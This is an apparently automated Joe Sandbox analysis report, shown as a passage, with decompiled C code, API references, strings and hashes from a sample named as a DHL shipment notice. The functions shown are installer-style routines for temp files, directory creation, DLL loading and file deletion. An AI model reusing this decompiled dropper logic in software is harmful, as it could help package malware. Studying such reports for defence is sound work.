                        						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
                        						E0040302E(0);
                        					}
                        					 *0x40ce70 = 0x78b730;
                        					 *0x40ce74 = 0x8000;
                        					if(E00406B96(?str?) < 0) {
                        						goto L20;
                        					}
                        					_t35 =  *0x40ce70; // 0x7923e3
                        					_t36 = _t35 - 0x78b730;
                        					if(_t36 == 0) {
                        						__eflags =  *0x40ce6c; // 0x0
                        						if(__eflags != 0) {
                        							goto L20;
                        						}
                        						__eflags = _t30;
                        						if(_t30 == 0) {
                        							goto L20;
                        						}
                        						L16:
                        						_t16 =  *0x79f734;
                        						if(_t16 -  *0x40ce60 + _a4 > 0) {
                        							continue;
                        						}
                        						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                        						goto L22;
                        					}
                        					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
                        					if(_t18 == 0) {
                        						_push(0xfffffffe);
                        						L21:
                        						_pop(_t15);
                        						return _t15;
                        					}
                        					 *0x40ce60 =  *0x40ce60 + _t36;
                        					_t48 =  *0x40ce6c; // 0x0
                        					if(_t48 != 0) {
                        						goto L6;
                        					}
                        					goto L16;
                        					L20:
                        					_push(0xfffffffd);
                        					goto L21;
                        				}
                        				return _t12 | 0xffffffff;
                        			}














                        APIs
                        • GetTickCount.KERNEL32 ref: 00403493
                          • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,Ody,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer$CountTick
                        • String ID: 07y$Ody$#y
                        • API String ID: 1092082344-2923550413
                        • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                        • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                        • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                        • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 556 4069cb-4069eb GetSystemDirectoryW 557 4069ed 556->557 558 4069ef-4069f1 556->558 557->558 559 406a02-406a04 558->559 560 4069f3-4069fc 558->560 562 406a05-406a38 wsprintfW LoadLibraryExW 559->562 560->559 561 4069fe-406a00 560->561 561->562
                        C-Code - Quality: 100%
                        			E004069CB(intOrPtr _a4) {
                        				short _v576;
                        				signed int _t13;
                        				struct HINSTANCE__* _t17;
                        				signed int _t19;
                        				void* _t24;
                        
                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                        				if(_t13 > 0x104) {
                        					_t13 = 0;
                        				}
                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                        					_t19 = 1;
                        				} else {
                        					_t19 = 0;
                        				}
                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                        				return _t17;
                        			}









                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                        • wsprintfW.USER32 ref: 00406A1D
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 563 405b9f-405bea CreateDirectoryW 564 405bf0-405bfd GetLastError 563->564 565 405bec-405bee 563->565 566 405c17-405c19 564->566 567 405bff-405c13 SetFileSecurityW 564->567 565->566 567->565 568 405c15 GetLastError 567->568 568->566
                        C-Code - Quality: 100%
                        			E00405B9F(WCHAR* _a4) {
                        				struct _SECURITY_ATTRIBUTES _v16;
                        				struct _SECURITY_DESCRIPTOR _v36;
                        				int _t22;
                        				long _t23;
                        
                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                        				_v36.Owner = 0x4083f8;
                        				_v36.Group = 0x4083f8;
                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                        				_v16.lpSecurityDescriptor =  &_v36;
                        				_v36.Revision = 1;
                        				_v36.Control = 4;
                        				_v36.Dacl = 0x4083e8;
                        				_v16.nLength = 0xc;
                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                        				if(_t22 != 0) {
                        					L1:
                        					return 0;
                        				}
                        				_t23 = GetLastError();
                        				if(_t23 == 0xb7) {
                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                        						goto L1;
                        					}
                        					return GetLastError();
                        				}
                        				return _t23;
                        			}








                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                        • GetLastError.KERNEL32 ref: 00405BF6
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                        • GetLastError.KERNEL32 ref: 00405C15
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3081826266
                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
                        C-Code - Quality: 100%
                        			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				intOrPtr _v8;
                        				short _v12;
                        				short _t12;
                        				intOrPtr _t13;
                        				signed int _t14;
                        				WCHAR* _t17;
                        				signed int _t19;
                        				signed short _t23;
                        				WCHAR* _t26;
                        
                        				_t26 = _a4;
                        				_t23 = 0x64;
                        				while(1) {
                        					_t12 =  *L"nsa"; // 0x73006e
                        					_t23 = _t23 - 1;
                        					_v12 = _t12;
                        					_t13 =  *0x40a5ac; // 0x61
                        					_v8 = _t13;
                        					_t14 = GetTickCount();
                        					_t19 = 0x1a;
                        					_v8 = _v8 + _t14 % _t19;
                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                        					if(_t17 != 0) {
                        						break;
                        					}
                        					if(_t23 != 0) {
                        						continue;
                        					} else {
                        						 *_t26 =  *_t26 & _t23;
                        					}
                        					L4:
                        					return _t17;
                        				}
                        				_t17 = _t26;
                        				goto L4;
                        			}













                        APIs
                        • GetTickCount.KERNEL32 ref: 004061AB
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-678247507
                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
                        C-Code - Quality: 100%
                        			E00403C2B() {
                        				void* _t1;
                        				void* _t2;
                        				void* _t4;
                        				signed int _t11;
                        
                        				_t1 =  *0x40a018; // 0xffffffff
                        				if(_t1 != 0xffffffff) {
                        					CloseHandle(_t1);
                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                        				}
                        				_t2 =  *0x40a01c; // 0xffffffff
                        				if(_t2 != 0xffffffff) {
                        					CloseHandle(_t2);
                        					 *0x40a01c =  *0x40a01c | 0xffffffff;
                        					_t11 =  *0x40a01c;
                        				}
                        				E00403C88();
                        				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsz26CF.tmp\\", 7); // executed
                        				return _t4;
                        			}








                        APIs
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                        • C:\Users\user\AppData\Local\Temp\nsz26CF.tmp\, xrefs: 00403C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz26CF.tmp\
                        • API String ID: 2962429428-3348034935
                        • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                        • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                        • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                        • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
                        C-Code - Quality: 92%
                        			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                        				long _v8;
                        				long _t21;
                        				long _t22;
                        				void* _t24;
                        				long _t26;
                        				int _t27;
                        				long _t28;
                        				void* _t30;
                        				long _t31;
                        				long _t32;
                        				long _t36;
                        
                        				_t21 = _a4;
                        				if(_t21 >= 0) {
                        					_t32 = _t21 +  *0x7a8af8;
                        					 *0x79f734 = _t32;
                        					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                        				}
                        				_t22 = E0040347F(4);
                        				if(_t22 >= 0) {
                        					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
                        					if(_t24 == 0) {
                        						L18:
                        						_push(0xfffffffd);
                        						goto L19;
                        					} else {
                        						 *0x79f734 =  *0x79f734 + 4;
                        						_t36 = E0040347F(_a4);
                        						if(_t36 < 0) {
                        							L21:
                        							_t22 = _t36;
                        						} else {
                        							if(_a12 != 0) {
                        								_t26 = _a4;
                        								if(_t26 >= _a16) {
                        									_t26 = _a16;
                        								}
                        								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                        								if(_t27 != 0) {
                        									_t36 = _v8;
                        									 *0x79f734 =  *0x79f734 + _t36;
                        									goto L21;
                        								} else {
                        									goto L18;
                        								}
                        							} else {
                        								if(_a4 <= 0) {
                        									goto L21;
                        								} else {
                        									while(1) {
                        										_t28 = _a4;
                        										if(_a4 >= 0x4000) {
                        											_t28 = 0x4000;
                        										}
                        										_v8 = _t28;
                        										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
                        											goto L18;
                        										}
                        										_t30 = E00406210(_a8, 0x793730, _v8); // executed
                        										if(_t30 == 0) {
                        											_push(0xfffffffe);
                        											L19:
                        											_pop(_t22);
                        										} else {
                        											_t31 = _v8;
                        											_a4 = _a4 - _t31;
                        											 *0x79f734 =  *0x79f734 + _t31;
                        											_t36 = _t36 + _t31;
                        											if(_a4 > 0) {
                        												continue;
                        											} else {
                        												goto L21;
                        											}
                        										}
                        										goto L22;
                        									}
                        									goto L18;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				L22:
                        				return _t22;
                        			}















                        APIs
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID: 07y
                        • API String ID: 973152223-1660179758
                        • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                        • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                        • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                        • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (legend: Executed, Not Executed)
                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
                        				void* _t17;
                        				int _t23;
                        				void* _t25;
                        				signed char _t26;
                        				short _t28;
                        				short _t31;
                        				short* _t34;
                        				void* _t36;
                        
                        				_t28 = __ebx;
                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                        				_t17 = E00405FE8(_t16);
                        				_t32 = _t17;
                        				if(_t17 != __ebx) {
                        					do {
                        						_t34 = E00405F6A(_t32, 0x5c);
                        						_t31 =  *_t34;
                        						 *_t34 = _t28;
                        						if(_t31 != _t28) {
                        							L5:
                        							_t25 = E00405C1C( *(_t36 + 8));
                        						} else {
                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
                        								goto L5;
                        							} else {
                        								_t25 = E00405B9F( *(_t36 + 8)); // executed
                        							}
                        						}
                        						if(_t25 != _t28) {
                        							if(_t25 != 0xb7) {
                        								L9:
                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        							} else {
                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                        								if((_t26 & 0x00000010) == 0) {
                        									goto L9;
                        								}
                        							}
                        						}
                        						 *_t34 = _t31;
                        						_t32 = _t34 + 2;
                        					} while (_t31 != _t28);
                        				}
                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                        					_push(0xfffffff5);
                        					E00401423();
                        				} else {
                        					E00401423(0xffffffe6);
                        					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                        					if(_t23 == 0) {
                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        					}
                        				}
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
                        				return 0;
                        			}












                        APIs
                          • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-47812868
                        • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                        • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                        • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                        • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (legend: Executed, Not Executed)
                        C-Code - Quality: 41%
                        			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
                        				int _t9;
                        				long _t13;
                        				WCHAR* _t14;
                        
                        				_t14 = _a4;
                        				_t13 = E00406139(_t14);
                        				if(_t13 == 0xffffffff) {
                        					L8:
                        					return 0;
                        				}
                        				_push(_t14);
                        				if((_a8 & 0x00000001) == 0) {
                        					_t9 = DeleteFileW();
                        				} else {
                        					_t9 = RemoveDirectoryW(); // executed
                        				}
                        				if(_t9 == 0) {
                        					if((_a8 & 0x00000004) == 0) {
                        						SetFileAttributesW(_t14, _t13);
                        					}
                        					goto L8;
                        				} else {
                        					return 1;
                        				}
                        			}







                        APIs
                          • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                          • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$Attributes$DeleteDirectoryRemove
                        • String ID:
                        • API String ID: 1655745494-0
                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (legend: Executed, Not Executed)
                        C-Code - Quality: 100%
                        			E00406AE6(void* __ecx, void* _a4) {
                        				long _v8;
                        				long _t6;
                        
                        				_t6 = WaitForSingleObject(_a4, 0x64);
                        				while(_t6 == 0x102) {
                        					E00406A77(0xf);
                        					_t6 = WaitForSingleObject(_a4, 0x64);
                        				}
                        				GetExitCodeProcess(_a4,  &_v8); // executed
                        				return _v8;
                        			}






                        APIs
                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ObjectSingleWait$CodeExitProcess
                        • String ID:
                        • API String ID: 2567322000-0
                        • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                        • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                        • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                        • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00406045(void* __eflags, intOrPtr _a4) {
                        				int _t11;
                        				signed char* _t12;
                        				long _t16;
                        				intOrPtr _t18;
                        				intOrPtr* _t21;
                        				signed int _t23;
                        
                        				E0040666E(0x7a4790, _a4);
                        				_t21 = E00405FE8(0x7a4790);
                        				if(_t21 != 0) {
                        					E004068F5(_t21);
                        					if(( *0x7a8ab8 & 0x00000080) == 0) {
                        						L5:
                        						_t23 = _t21 - 0x7a4790 >> 1;
                        						while(1) {
                        							_t11 = lstrlenW(0x7a4790);
                        							_push(0x7a4790);
                        							if(_t11 <= _t23) {
                        								break;
                        							}
                        							_t12 = E004069A4();
                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                        								E00405F89(0x7a4790);
                        								continue;
                        							} else {
                        								goto L1;
                        							}
                        						}
                        						E00405F3D();
                        						_t16 = GetFileAttributesW(??); // executed
                        						return 0 | _t16 != 0xffffffff;
                        					}
                        					_t18 =  *_t21;
                        					if(_t18 == 0 || _t18 == 0x5c) {
                        						goto L1;
                        					} else {
                        						goto L5;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}










                        APIs
                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                          • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                        • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
                        • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID:
                        • API String ID: 3248276644-0
                        • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                        • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                        • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                        • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
                        				intOrPtr* _t6;
                        				void* _t8;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t12;
                        				signed int _t16;
                        				signed int _t17;
                        				void* _t18;
                        
                        				_t17 = _a4;
                        				while(_t17 >= 0) {
                        					_t6 = _t17 * 0x1c +  *0x7a8ad0;
                        					if( *_t6 == 1) {
                        						break;
                        					}
                        					_push(_t6); // executed
                        					_t8 = E00401434(); // executed
                        					if(_t8 == 0x7fffffff) {
                        						return 0x7fffffff;
                        					}
                        					_t10 = E0040136D(_t8);
                        					if(_t10 != 0) {
                        						_t11 = _t10 - 1;
                        						_t16 = _t17;
                        						_t17 = _t11;
                        						_t12 = _t11 - _t16;
                        					} else {
                        						_t12 = _t10 + 1;
                        						_t17 = _t17 + 1;
                        					}
                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                        						 *0x7a7a8c =  *0x7a7a8c + _t12;
                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
                        					}
                        				}
                        				return 0;
                        			}












                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                        • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                        • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                        • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
